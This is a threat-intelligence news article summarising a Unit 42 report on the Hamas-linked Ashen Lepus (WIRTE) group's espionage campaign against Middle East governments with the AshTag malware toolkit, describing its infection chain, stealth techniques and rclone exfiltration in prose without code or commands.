Ashen Lepus (WIRTE) Targets Middle East Governments with Stealthy AshTag Malware Toolkit
The Unit 42 team at Palo Alto Networks has documented a prolonged and low-visibility campaign targeting government bodies and diplomatic organizations across the Middle East. The activity is attributed to the Ashen Lepus group, also known as WIRTE, which is linked to Hamas.
According to the report, the group maintained its operational tempo throughout 2025 despite the Israel–Hamas conflict and continued its activities even after the Gaza ceasefire in October 2025. Observations and VirusTotal download data indicate a widening geographic scope: targets now include entities within the Palestinian Authority, Egypt, and Jordan, as well as Oman and Morocco. While the lure themes remain anchored in regional affairs, content related to Turkey and its relations with the Palestinian Authority has appeared with increasing frequency.
The most significant shift is the adoption of a new component set dubbed AshTag. The infection chain typically begins with a seemingly harmless PDF that redirects victims to a file-sharing service hosting a RAR archive. Inside is an executable disguised as a sensitive document, a malicious loader, and an additional decoy PDF. When launched, DLL sideloading is triggered: a “legitimate” document opens on screen, while subsequent stages quietly unfold in the background to deliver the primary payload.
The report highlights a marked increase in stealth. Payloads are encrypted, executed in memory, and leave fewer forensic traces, while the command-and-control infrastructure is camouflaged as legitimate traffic. Rather than relying on dedicated domains, the attackers register new API and authentication subdomains on legitimate websites, allowing their activity to blend seamlessly into normal network flows.
Further obfuscation is achieved through geofencing and environmental checks, complicating automated analysis and making it harder to reconstruct the full attack chain. Certain data fragments are concealed within HTML page markup, and the C2 server, according to Unit 42, can filter out sandboxes based on geolocation and distinctive user-agent patterns.
AshTag is described as a modular .NET toolkit under active development, designed for remote control and data exfiltration. Its capabilities include system reconnaissance, file operations, downloading and executing additional modules, and persistence via the task scheduler. After the initial compromise, the group shifted to hands-on activity: tailored documents were selected and staged through loaded modules, with files stored in locations such as C:\Users\Public.
In one telemetry-documented incident, Ashen Lepus used rclone to exfiltrate data to an attacker-controlled server. The report notes that this choice lends credibility at the traffic level and aligns with a broader trend in which threat actors leverage legitimate utilities for file transfers, making their operations harder to distinguish from benign activity.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
